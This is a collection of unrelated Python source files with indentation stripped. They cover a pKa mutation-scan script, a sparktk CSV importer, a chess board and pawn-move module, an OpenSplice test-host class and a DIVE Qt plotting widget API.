# if str(inst).find('Cannot model mutant')!=-1:
# solutions='Cannot model mutant'
# raise Exception('Cannot model mutant')
# elif str(inst).find('We cannot model insertions')!=-1:
# solutions='Skipping insertions'
# else:
# print inst
# raise Exception(str(inst))
print
print
print 'Results are ',solutions
results[variant_name]=solutions
#
# Save this result
#
print 'Saving',results[variant_name],'in',resultfile
import os
if len(os.path.split(resultfile)[1])>80:
continue
fd=open(resultfile,'w')
pickle.dump(results[variant_name],fd)
print '*********************'
fd.close()
#
# Save all
#
name=os.path.join(os.getcwd(),'%s.mutscan.pickle' %pdbfile)
fd=open(name,'w')
import pickle
pickle.dump(results,fd)
fd.close()
if __name__=="__main__":
print
print 'Calculate changes in pKa values for a list of mutations'
print '(c) Copyright <NAME>, 2008-2010, All rights reserved'
print
import sys, os
from optparse import OptionParser
parser = OptionParser(usage='%prog [options] <pdbfile> <mutation_file>',version='%prog 1.0')
parser.add_option('-t',"--target", dest='target_groups',type='string',action='append',
help="Residues to calculate dpKa values for. Specify multiple times. Default: ALL",default=[])
parser.add_option('-i','--recalc_intpka',dest='recalc_intpka',action='store_true',
help='Recalculate intrinsic pKa for target residues. Default= %default',default=True)
parser.add_option('-j','--no_recalc_intpka',dest='recalc_intpka',action='store_false',
help='Do not recalculate intrinsic pKa value for target')
parser.add_option('-e','--recalc_intpka_dist',dest='recalc_intpka_dist',action='store',
help='Mutations closer than this distance to the target group will force a recalculation of the intrinsic pKa of the target. Default: %default A',
default=10)
parser.add_option('-m','--ionic_strength',dest='ion',type='float',action='store',
help='ionic strength to use in the calculations. Default= %default',default=0.144)
parser.add_option('-a','--all_mutations',dest='allmutations',action='store_true',
help='Ignore the mutation file and try all possible mutations. Default= %default',default=False)
(options, args) = parser.parse_args()
if len(args)!=2 and not (options.allmutations and len(args)==1):
parser.error('You must specify a PDB file and a mutation file, or -a and a PDB file.')
#
# Call main
#
main(options,args)
|
# vim: set encoding=utf-8
# Copyright (c) 2016 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from sparktk.tkcontext import TkContext
from pyspark.rdd import RDD
import sparktk.dtypes as dtypes
from sparktk.arguments import require_type
def import_csv_raw(path, delimiter=",", header=False, tc=TkContext.implicit):
"""
Creates a frame by importing the data as strings from the specified csv file. If the csv file has a header row,
those values will be used as column names. Otherwise, columns will be named generically, like 'C0', 'C1', 'C2', etc.
Parameters
----------
:param path: (str) Full path to the csv file
:param delimiter: (str) A string which indicates the separation of data fields. This is usually a single character
and could be a non-visible character, such as a tab. The default delimiter is a comma (,).
:param header: (bool) Boolean value indicating if the first line of the file will be used to name columns, and not
be included in the data. The default value is false.
:return: (Frame) Frame that contains the data from the csv file
Examples
--------
Import raw data from a csv file by specifying the path to the file, delimiter, and header option. All data will
be brought in the frame as strings, and columns will be named according to the header row, if there was one.
>>> file_path = "../datasets/cities.csv"
>>> frame = tc.frame.import_csv_raw(file_path, delimiter="|", header=True)
-etc-
>>> frame.inspect()
[#] rank city population_2013 population_2010 change county
============================================================================
[0] 1 Portland 609456 583776 4.40% Multnomah
[1] 2 Salem 160614 154637 3.87% Marion
[2] 3 Eugene 159190 156185 1.92% Lane
[3] 4 Gresham 109397 105594 3.60% Multnomah
[4] 5 Hillsboro 97368 91611 6.28% Washington
[5] 6 Beaverton 93542 89803 4.16% Washington
[6] 15 Grants Pass 35076 34533 1.57% Josephine
[7] 16 Oregon City 34622 31859 8.67% Clackamas
[8] 17 McMinnville 33131 32187 2.93% Yamhill
[9] 18 Redmond 27427 26215 4.62% Deschutes
>>> frame.schema
[('rank', <type 'str'>), ('city', <type 'str'>), ('population_2013', <type 'str'>), ('population_2010', <type 'str'>), ('change', <type 'str'>), ('county', <type 'str'>)]
"""
TkContext.validate(tc)
require_type.non_empty_str(path, "path")
require_type.non_empty_str(delimiter, "delimiter")
require_type(bool, header, "header")
df = tc.sql_context.read.format(
"com.databricks.spark.csv.org.trustedanalytics.sparktk").options(
delimiter=delimiter,
header=str(header).lower(),
inferschema="false").load(path, schema=None)
df_schema = []
for column in df.schema.fields:
try:
datatype = dtypes.dtypes.get_primitive_type_from_pyspark_type(type(column.dataType))
except ValueError:
raise TypeError("Unsupported data type ({0}) for column {1}.".format(str(column.dataType), column.name))
df_schema.append((column.name, datatype))
jrdd = tc.sc._jvm.org.trustedanalytics.sparktk.frame.internal.rdd.PythonJavaRdd.scalaToPython(df._jdf.rdd())
rdd = RDD(jrdd, tc.sc)
from sparktk.frame.frame import Frame # circular dependency, so import late
return Frame(tc, rdd, df_schema) |
"""
Module for chess table items (board ...)
"""
import re
from chess.set import box
class Board:
"""Chess board composed of rank file positions, and pieces at play.
"""
def __init__(self):
self._positions = dict()
for file in range(ord('a'), ord('h') + 1):
for rank in range(1, 9):
square = '%s%s' % (chr(file), rank)
self._positions[square] = Position(square)
self._piece_movement_specification = PieceMovementSpecification()
# Setup white
self._setup_major_pieces(1, box.Color.WHITE)
self._setup_minor_pieces(2, box.Color.WHITE)
# Setup black
self._setup_major_pieces(8, box.Color.BLACK)
self._setup_minor_pieces(7, box.Color.BLACK)
def _setup_major_pieces(self, rank, color):
self._positions['a%s' % rank].piece = box.Rook(color)
self._positions['b%s' % rank].piece = box.Knight(color)
self._positions['c%s' % rank].piece = box.Bishop(color)
self._positions['d%s' % rank].piece = box.Queen(color)
self._positions['e%s' % rank].piece = box.King(color)
self._positions['f%s' % rank].piece = box.Bishop(color)
self._positions['g%s' % rank].piece = box.Knight(color)
self._positions['h%s' % rank].piece = box.Rook(color)
def _setup_minor_pieces(self, rank, color):
for file in range(ord('a'), ord('h') + 1):
square = '%s%s' % (chr(file), rank)
self._positions[square].piece = box.Pawn(color)
def move_piece(self, position_from, position_to):
"""Moves piece from one position to another. Capturing a piece occupied
by the position to move to.
Parameters
----------
position_from : chess.set.table.Position
Position to move piece from.
position_to : chess.set.table.Position
Position to move piece to.
Returns
-------
None
Raises
------
chess.board.board.IllegalMoveError
Raised when piece move is illegal.
"""
piece = self.get_piece(position_from)
board_position_from = self._positions[str(position_from)]
board_position_to = self._positions[str(position_to)]
if not self._piece_movement_specification\
.is_satisfied_by(board_position_from, board_position_to):
raise IllegalMoveError('%s to %s is an illegal move!'
% (str(board_position_from),
str(board_position_to)))
self._remove_piece(position_from)
self._place_piece(position_to, piece)
def _place_piece(self, position, piece):
""" Places piece at given position, if a piece is already
in the position, it is captured.
Parameters
----------
position : chess.set.table.Position
Position to place the piece on.
piece : chess.set.box.Piece
Chess piece to place at position.
Returns
-------
None
"""
self._positions[str(position)].piece = piece
def _remove_piece(self, position):
self._positions[str(position)].piece = None
def get_piece(self, position):
"""Gets chess piece at given position.
Parameters
----------
position: chess.set.table.Position
Position to get chess piece from.
Returns
-------
chess.box.Piece
Chess piece if position is occupied, otherwise None.
"""
return self._positions[str(position)].piece
class Position:
"""Represents a chess position on the board.
Parameters
----------
square : str
Chess board position string in the form [file][rank].
Attributes
----------
file : str
Chess board column position, values in a-h
rank : int
Chess board row position, values 1-8
piece : chess.set.box.Piece, optional(default=None)
Chess piece at position. Defaults to None.
Raises
------
ValueError
If invalid square format.
"""
def __init__(self, square, piece=None):
if not re.match('^[a-hA-H][1-8]$', square):
raise ValueError('Invalid position format needs to '
'be [a-e][1-8]: %s' % square)
self.file = square[0].lower()
self.rank = int(square[1])
self.piece = piece
def is_occupied(self):
"""Informs if position is occupied by a chess piece.
Returns
-------
bool
Returns true if occupied by a chess piece, otherwise false.
"""
return self.piece is not None
def __str__(self):
return '%s%s' % (self.file, self.rank)
class PieceMovementSpecification:
def __init__(self):
self._movement_specs = {'P': PawnMovementSpecification()}
def is_satisfied_by(self, position_from, position_to):
piece = position_from.piece
if piece is None or piece.symbol not in self._movement_specs:
return False
specification = self._movement_specs[piece.symbol]
return specification.is_satisfied_by(position_from, position_to)
class MovementCompositeSpecification:
def is_satisfied_by(self, position_from, position_to):
"""Is the position change a valid move.
Parameters
----------
position_from : chess.set.table.Position
Position to move piece from.
position_to : chess.set.table.Position
Position to move piece to.
Returns
-------
bool
If move is valid.
"""
raise NotImplementedError()
def __and__(self, movement_specification):
return AndMovementSpecification(self, movement_specification)
def __or__(self, movement_specification):
return OrMovementSpecification(self, movement_specification)
@staticmethod
def rank_distance(position_from, position_to):
"""Calculates position distance between ranks.
Parameters
----------
position_from : chess.set.table.Position
Position to move piece from.
position_to : chess.set.table.Position
Position to move piece to.
Returns
-------
int
Distance in positions between ranks.
"""
return position_to.rank - position_from.rank
@staticmethod
def file_distance(position_from, position_to):
"""Calculates distance between files (ordinal).
----------
position_from : chess.set.table.Position
Position to move piece from.
position_to : chess.set.table.Position
Position to move piece to.
Returns
-------
int
Ordinal distance in positions between files.
"""
return ord(position_to.file) - ord(position_from.file)
class OrMovementSpecification(MovementCompositeSpecification):
"""Combines two MovementSpecifications logically by Or.
Attributes
----------
movement_specification_one: MovementCompositeSpecification
Movement specification one (left) to combine
movement_specification_two: MovementCompositeSpecification
Movement specification two (right) to combine
"""
def __init__(self, movement_specification_one, movement_specification_two):
self.movement_specification_one = movement_specification_one
self.movement_specification_two = movement_specification_two
def is_satisfied_by(self, position_from, position_to):
"""Is the position change a valid move.
Parameters
----------
position_from : chess.set.table.Position
Position to move piece from.
position_to : chess.set.table.Position
Position to move piece to.
Returns
-------
bool
If move is valid.
"""
left_result = self.movement_specification_one\
.is_satisfied_by(position_from, position_to)
right_result = self.movement_specification_two \
.is_satisfied_by(position_from, position_to)
return left_result or right_result
class AndMovementSpecification(MovementCompositeSpecification):
"""Combines two MovementSpecifications logically by And.
Attributes
----------
movement_specification_one: MovementCompositeSpecification
Movement specification one (left) to combine
movement_specification_two: MovementCompositeSpecification
Movement specification two (right) to combine
"""
def __init__(self, movement_specification_one, movement_specification_two):
self.movement_specification_one = movement_specification_one
self.movement_specification_two = movement_specification_two
def is_satisfied_by(self, position_from, position_to):
"""Is the position change a valid move.
Parameters
----------
position_from : chess.set.table.Position
Position to move piece from.
position_to : chess.set.table.Position
Position to move piece to.
Returns
-------
bool
If move is valid.
"""
return self.movement_specification_one.is_satisified_by(
position_from, position_to) \
and self.movement_specification_two.is_satisfied_by(
position_from, position_to)
class DiagonalMovementSpecification(MovementCompositeSpecification):
"""Specification for diagonal piece movement."""
def is_satisfied_by(self, position_from, position_to):
"""Is piece moving diagonal.
Parameters
----------
position_from : chess.set.table.Position
Position to move piece from.
position_to : chess.set.table.Position
Position to move piece to.
Returns
-------
bool
If move is valid.
"""
piece = position_from.piece
if piece is not None:
return self._is_move_diagonal(position_from, position_to)
else:
return False
def _is_move_diagonal(self, position_from, position_to):
file_distance = self.file_distance(position_from, position_to)
rank_distance = self.rank_distance(position_from, position_to)
return abs(file_distance) > 0 and rank_distance == file_distance
class ForwardMovementSpecification(MovementCompositeSpecification):
"""Specification for forward piece movement."""
def is_satisfied_by(self, position_from, position_to):
"""Is piece moving forward.
Parameters
----------
position_from : chess.set.table.Position
Position to move piece from.
position_to : chess.set.table.Position
Position to move piece to.
Returns
-------
bool
If move is valid.
"""
piece = position_from.piece
if piece is not None:
return self._is_movement_forward(position_from, position_to)
else:
return False
def _is_movement_forward(self, position_from, position_to):
file_distance = self.file_distance(position_from, position_to)
rank_distance = self.rank_distance(position_from, position_to)
piece = position_from.piece
if piece.color is box.Color.WHITE:
return file_distance == 0 and rank_distance > 0
else:
return file_distance == 0 and rank_distance < 0
class PawnMovementSpecification(MovementCompositeSpecification):
"""Movement specification for valid pawn movements.
"""
def is_satisfied_by(self, position_from, position_to):
"""Is valid pawn move.
Parameters
----------
position_from : chess.set.table.Position
Position to move piece from.
position_to : chess.set.table.Position
Position to move piece to.
Returns
-------
bool
If move is valid.
"""
piece = position_from.piece
if piece is not None and piece.symbol == 'P':
specification = ForwardMovementSpecification()\
| (DiagonalMovementSpecification())
return specification.is_satisfied_by(position_from, position_to)
else:
return False
class ChessError(Exception):
"""Base class for chess exceptions."""
pass
class IllegalMoveError(ChessError):
"""Illegal chess move was attempted."""
pass
|
<reponame>brezillon/opensplice<filename>testsuite/tests/stax/python/host.py
import os
import socket
from process import Process
from ospl import OSPL
from test_errors import TestError
#===============================================================================
class Host:
"""A machine and its environment that a part of a test case runs on.
Each requires a STAF daemon.
"""
# Local host default name:
LOCAL_HOST_NAME = socket.gethostname()
# STAF default TCP port:
STAF_DEFAULT_PORT = 6500
default_config_map = {
"OSMajorVersion" : "unknown",
"OSMinorVersion" : "unknown",
"OSName" : os.name,
"OSRevision" : "unknown",
"FileSep" : os.sep,
"LineSep" : os.linesep,
"PathSep" : os.pathsep}
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def __init__(self,
ospl_home = "",
test_root = ".",
ospl_uri = "",
host_name = LOCAL_HOST_NAME,
staf_port = STAF_DEFAULT_PORT):
"""Constructs a host.
Required are:
1) The root at which the test framework can be found.
2) The value of OSPL_HOME that is to be tested.
3) The OSPL URI value.
4) The/A DNS name of the host.
5) The location of the STAF daemon if not at the default port.
"""
# The location where the test framework can be found:
self.test_root = test_root
# The OSPL_HOME of the host to be tested:
self.ospl_home = ospl_home
# The host name:
self.host_name = host_name
# The port of the host STAF:
self.staf_port = staf_port
# Host system environment:
self.host_env = []
# List of the processes of the host:
self.process_list = []
# Config map for the host - contain system dependent issues:
self.config_map = Host.default_config_map
# 'ospl' command instance:
self.ospl = OSPL("%s%sbin%s"% (self.ospl_home,
self.get_file_sep(),
self.get_file_sep()), ospl_uri)
# Check if host name is valid:
self.check_host_name()
# Check if STAF port is valid:
self.check_staf_port()
# Host log dir:
self.log_dir = ""
# Host release script name:
self.release_script_name = "release"
# Host release script ext:
self.release_script_ext = ""
# The host role:
self.role = ""
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_release_script_name(self):
"""Get the host release script name"""
return self.release_script_name
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def set_release_script_name(self, name):
"""Set the host release script name"""
self.release_script_name = name
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_release_script_ext(self):
"""Get the host release script ext"""
return self.release_script_ext
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def set_release_script_ext(self, ext):
"""Set the host release script ext"""
self.release_script_ext = ext
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def set_test_root(self, test_root):
"""Set the host test root"""
self.test_root = test_root
self.check_test_root()
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_test_root(self):
"""Get the host test root"""
return self.test_root
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def check_test_root(self):
"""Check if test root location is valid"""
# A test root must be a non-empty string:
if (self.test_root == "" or self.test_root == None):
raise TestError("Host::check_test_root - invalid value \"%s\" for the test root!"%\
self.test_root)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def set_ospl_home(self, ospl_home):
"""Set the host OSPL_HOME"""
# Set:
self.ospl_home = ospl_home
# Check:
self.check_ospl_home()
# Reset 'ospl' command to new OSPL HOME:
self.ospl.set_ospl_home_bin(self.ospl_home + "/bin/")
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def set_ospl_bin(self, ospl_home_bin):
"""Set the host OSPL_BIN"""
self.ospl.set_ospl_home_bin(ospl_home_bin)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_ospl_home(self):
"""Get the host OSPL_HOME"""
return self.ospl_home
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def check_ospl_home(self):
"""Check if OSPL_HOME is valid"""
# OSPL_HOME must be a non-empty string:
if (self.ospl_home == "" or self.ospl_home == None):
raise TestError("Host::check_ospl_home - invalid value \"%s\" for the OSPL_HOME!"%\
self.ospl_home)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def set_host_name(self, host_name):
"""Set the host name"""
self.host_name = host_name
self.check_host_name()
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_host_name(self):
"""Get the host name"""
return self.host_name
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def check_host_name(self):
"""Check if host name is valid"""
# A host name must be a non-empty string:
if (self.host_name == "" or self.host_name == None):
raise TestError("Host::check_host_name - invalid value \"%s\" for the host name!"%\
self.host_name)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def set_staf_port(self, staf_port):
"""Set the host STAF port"""
self.staf_port = staf_port
self.check_staf_port()
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_staf_port(self):
"""Get the host STAF port"""
return self.staf_port
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def check_staf_port(self):
"""Check if STAF port is valid"""
# STAF port must be greater than 0:
if (self.staf_port <= 0):
raise TestError("Host::check_staf_port - invalid value \"%d\" for the STAF port!"%\
self.staf_port)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_staf_url(self):
"""Get the host STAF URL"""
return "tcp://%s@%s"% (self.host_name, self.staf_port)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def add_process(self, process):
"""Add new process to the process list"""
# Check if the process is Ok:
self.check_process(process)
# Set process ID on the host:
process.set_id(len(self.process_list) + 1)
# Add process to the list:
self.process_list.append(process)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def define_process(self,
command,
args = "",
working_dir = ".",
log_file = ""):
"""Define new process for the host"""
# Create process:
new_process = Process(command, args, working_dir, log_file)
# Set process ID on the host:
new_process.set_id(len(self.process_list) + 1)
# Add the process to the list:
self.process_list.append(new_process)
# Return the instance:
return self.process_list[-1:][0]
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def check_process(self, process):
"""Check if the process object is not 'None'"""
if process == None:
raise TestError("Host::check_process - invalid value \"%s\" for the process object!"%\
process)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_all_processes(self):
"""Return the host process list"""
return self.process_list
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def set_ospl_log_dir(self, ospl_log_dir):
"""Set log directory for OSPL"""
self.ospl.set_working_dir(ospl_log_dir)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_ospl_log_dir(self):
"""Get log directory for OSPL"""
return self.ospl.get_working_dir()
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_ospl_args_to_start(self):
"""Get arguments for OSPL to start the/a domain"""
return self.ospl.get_start_cmd_args()
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_ospl_args_to_stop(self):
"""Get arguments for OSPL to stop the/a domain"""
return self.ospl.get_stop_cmd_args()
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_ospl_args_to_list(self):
"""Get arguments for OSPL to list the/a domain"""
return self.ospl.get_list_cmd_args()
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_ospl_args_to_status(self):
"""Get arguments for OSPL to get the status of the/a domain"""
return self.ospl.get_status_cmd_args()
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_ospl_command(self):
"""Get command for OSPL"""
return self.ospl.get_command()
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def set_config_map(self, config_map):
"""Set config for the host"""
self.config_map = config_map
self.check_config_map()
# 'ospl' command instance:
self.ospl = OSPL("%s%sbin%s"% (self.ospl_home,
self.get_file_sep(),
self.get_file_sep()), self.ospl.get_uri())
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def check_config_map(self):
"""Check if the config_map object is not 'None'"""
if self.config_map == None:
raise TestError("Host::config_map - invalid value \"%s\" for the process object!"%\
self.config_map)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_config_map(self):
"""Get config of the host"""
return self.config_map
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def is_windows(self):
"""Check if host OS is Windows family"""
return (self.config_map["OSName"].find("Win") != -1)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_file_sep(self):
"""Returns the file path separator for this host"""
return self.config_map["FileSep"]
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_path_sep(self):
"""Returns the path separator for this host"""
return self.config_map["PathSep"]
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_line_sep(self):
"""Returns the line separator for this host"""
return self.config_map["LineSep"]
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_os_name(self):
"""Returns a string describing the OS on this host"""
return (self.config_map["OSName"] + " " +\
self.config_map["OSMajorVersion"] + "." +\
self.config_map["OSMinorVersion"] + "." +\
self.config_map["OSRevision"])
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def set_ospl_uri(self, uri):
"""Set OSPL URI"""
self.ospl.set_uri(uri)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_ospl_uri(self):
"""Get OSPL URI"""
return self.ospl.get_uri()
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def set_host_env(self, host_env):
"""Set the host system environment"""
self.host_env = host_env
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_host_env(self):
"""Get the host system environment"""
return self.host_env
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_env_value(self, name):
"""Get the host system environment by the name"""
value = ""
for env in self.host_env:
if env.find(name) != -1:
value = env[env.find("=") + 1:]
break
return value
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def set_env_value(self, name, value):
"""Set the host system environment by the name"""
for env in self.host_env:
if env.find(name) != -1:
self.host_env.remove(env)
break
self.host_env.append("%s=%s"% (name, value))
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def set_log_dir(self, log_dir):
"""Set the host log dir"""
self.log_dir = log_dir
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_log_dir(self):
"""Get the host log dir"""
return self.log_dir
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def translate_path(self, host_path, host_file_sep):
"""Translate FS path"""
return host_path.replace(host_file_sep, self.get_file_sep())
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_process_by_name(self, name):
"""Get the host process by name"""
for process in self.process_list:
if name == process.get_name():
return process
return None
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def set_role(self, role):
"""Set the host role"""
self.role = role
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def get_role(self):
"""Get the host role"""
return self.role
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def __str__(self):
"""Define new host for the scenraio"""
string = "Host:\nhostname [%s]\nrole [%s]\ntest root [%s]\nOSPL_HOME [%s]\nlog dir [%s]\nSTAF URL [%s]\nENV %s\n"%\
(self.host_name,
self.role,
self.test_root,
self.ospl_home,
self.log_dir,
self.get_staf_url(),
self.host_env)
string += "-----\n"
string += str(self.ospl)
for process in self.process_list:
string += "-----\n"
string += str(process)
return string
#===============================================================================
|
<reponame>Dive576/DIVE
from ._components.dive_manager import DIVEManager as _DIVEManager
import importlib as _importlib
import vispy as _vp
qt = _vp.app.use_app().backend_name
try:
_qtcore = _importlib.import_module('{}.QtCore'.format(qt))
_qtwidgets = _importlib.import_module('{}.QtWidgets'.format(qt))
except:
pass
else:
del qt
class DIVEWidget(_qtwidgets.QWidget):
"""
The main Qt widget for DIVE.
Parameters
----------
unit_reg : None, pint.UnitRegistry (Default: None)
The unit registry to use for unit conversions.
If None, the default UnitRegistry in pint will be used.
Only valid if the "pint" module has been installed.
*args
Any parameters that are accepted by a QWidget.
**kwargs
Any keyword parameters that are accepted by a QWidget.
Signals
-------
current_time_changed
This signal is sent whenever the current time changes in DIVE.
"""
current_time_changed = _qtcore.pyqtSignal() if hasattr(_qtcore, 'pyqtSignal') else _qtcore.Signal()
def __init__(self, unit_reg=None, *args, **kwargs):
super().__init__(*args,**kwargs)
self.setWindowTitle('Data Interface for Visual Exploration')
self._dive_manager = _DIVEManager(self, unit_reg)
def add_arrow_artist(self, axis_name, name, data_name, x_field, y_field, z_field=None, label_field=None, label_size=10, visible=True, draw_order=0, label_draw_order=0, legend_text=None, selectable=True,
line_width=1, line_color='r', line_color_field=None, line_colormap='viridis', line_color_label=None, line_color_unit=None,
arrow_shape='stealth', arrow_spacing=0, show_last_arrow=True, arrow_size=10,
arrow_color='g', arrow_color_field=None, arrow_colormap='viridis', arrow_color_label=None, arrow_color_unit=None):
"""
Add an arrow artist to an axis in DIVE.
Parameters
----------
axis_name : str
The name of the axis that this artist should be added to.
name : str
The name of this artist.
data_name : str
The name of the data object to use for this artist.
x_field : str
The name of the field in the data object that contains the x coordinates for this artist.
y_field : str
The name of the field in the data object that contains the y coordinates for this artist.
z_field : None, str (Default: None)
The name of the field in the data object that contains the z coordinates for this artist.
If None, this artist will be two-dimensional.
label_field : None, str (Default: None)
The name of the field in the data object that contains labels for each data point.
If None, labels will not be shown.
label_size : numeric (Default: 10)
The font size to use for labels.
visible : bool (Default: True)
Toggle whether this artist is visible.
draw_order : numeric (Default: 0)
The number used to determine the draw order for this artist.
Artists with small "draw_order" values are drawn before artists with large "draw_order" values.
label_draw_order : numeric (Default: 0)
The number used to determine the draw order for labels.
legend_text : None, str (Default: None)
The label to display in the legend for this artist.
If None, this artist will not appear in the legend.
selectable : bool (Default: True)
Toggle whether this artist is selectable.
line_width : numeric (Default: 1)
The width of the lines.
If 0, lines are not shown.
line_color : str (Default: "r")
The color to use for the lines.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "line_color_field" is None.
line_color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the lines.
line_colormap: str (Default: "viridis")
The name of the colormap to use for the lines.
Only used if "line_color_field" is not None.
line_color_label: None, str (Default: None)
The label to use for line color values on the colorbar.
Only used if "line_color_field" is not None.
line_color_unit: None, array (Default: None)
The unit to use for line color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "line_color_field" is not None.
arrow_shape: str (Default: "stealth")
The shape to use for the arrow heads.
arrow_spacing: int (Default: 0)
The number of data points between each arrow head.
If 0, arrow heads will only be shown for the last data point.
show_last_arrow: bool (Default: True)
Toggle display of last arrow head even if "arrow_spacing" would exclude it.
Only used if "arrow_spacing" is not 0.
arrow_size: numeric (Default: 10)
The size of the arrow heads.
arrow_color : str (Default: "g")
The color to use for the arrow heads.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "arrow_color_field" is None.
arrow_color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the arrow heads.
arrow_colormap: str (Default: "viridis")
The name of the colormap to use for the arrow heads.
Only used if "arrow_color_field" is not None.
arrow_color_label: None, str (Default: None)
The label to use for arrow head color values on the colorbar.
Only used if "arrow_color_field" is not None.
arrow_color_unit: None, array (Default: None)
The unit to use for arrow head color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "arrow_color_field" is not None.
Notes
-----
If the data object has an ID field, lines will only connect points with the same ID.
When multiple color fields are in use in an axis (either in a single artist or across multiple artists),
all color fields that have the same colormap, color_label, and color_unit will share the same colorbar.
All colorbar values that aren't numeric or timestamps (with tz),
will instead be displayed in the legend (as long as "legend_text" is not None).
It is possible to cycle through the colorbars in an axis by clicking on the colorbar.
"""
self._dive_manager.add_artist(axis_name, 'arrow', dict(name=name, data_name=data_name, x_field=x_field, y_field=y_field, z_field=z_field, label_field=label_field, label_size=label_size, visible=visible, draw_order=draw_order, label_draw_order=label_draw_order, legend_text=legend_text, selectable=selectable,
line_width=line_width, line_color=line_color, line_color_field=line_color_field, line_colormap=line_colormap, line_color_label=line_color_label, line_color_unit=line_color_unit,
arrow_shape=arrow_shape, arrow_spacing=arrow_spacing, show_last_arrow=show_last_arrow, arrow_size=arrow_size,
arrow_color=arrow_color, arrow_color_field=arrow_color_field, arrow_colormap=arrow_colormap, arrow_color_label=arrow_color_label, arrow_color_unit=arrow_color_unit))
def add_axis(self, name, axis_type, title=None, x_grid=True, y_grid=True, z_grid=True, x_label=None, y_label=None, z_label=None, x_unit=None, y_unit=None, z_unit=None, time_autoscale=False):
"""
Add an axis to DIVE.
Parameters
----------
name : str
The name to use for this axis.
axis_type : str
The type of view this axis provides.
Allowed values are: "2d", "3d"
title : None, str (Default: None)
The title to show above this axis.
x_grid : bool (Default: True)
Toggle whether the x-axis grid lines are displayed.
y_grid : bool (Default: True)
Toggle whether the y-axis grid lines are displayed.
z_grid : bool (Default: True)
Toggle whether the z-axis grid lines are displayed.
x_label : None, str (Default: None)
The label to show for the x-axis.
y_label : None, str (Default: None)
The label to show for the y-axis.
z_label : None, str (Default: None)
The label to show for the z-axis.
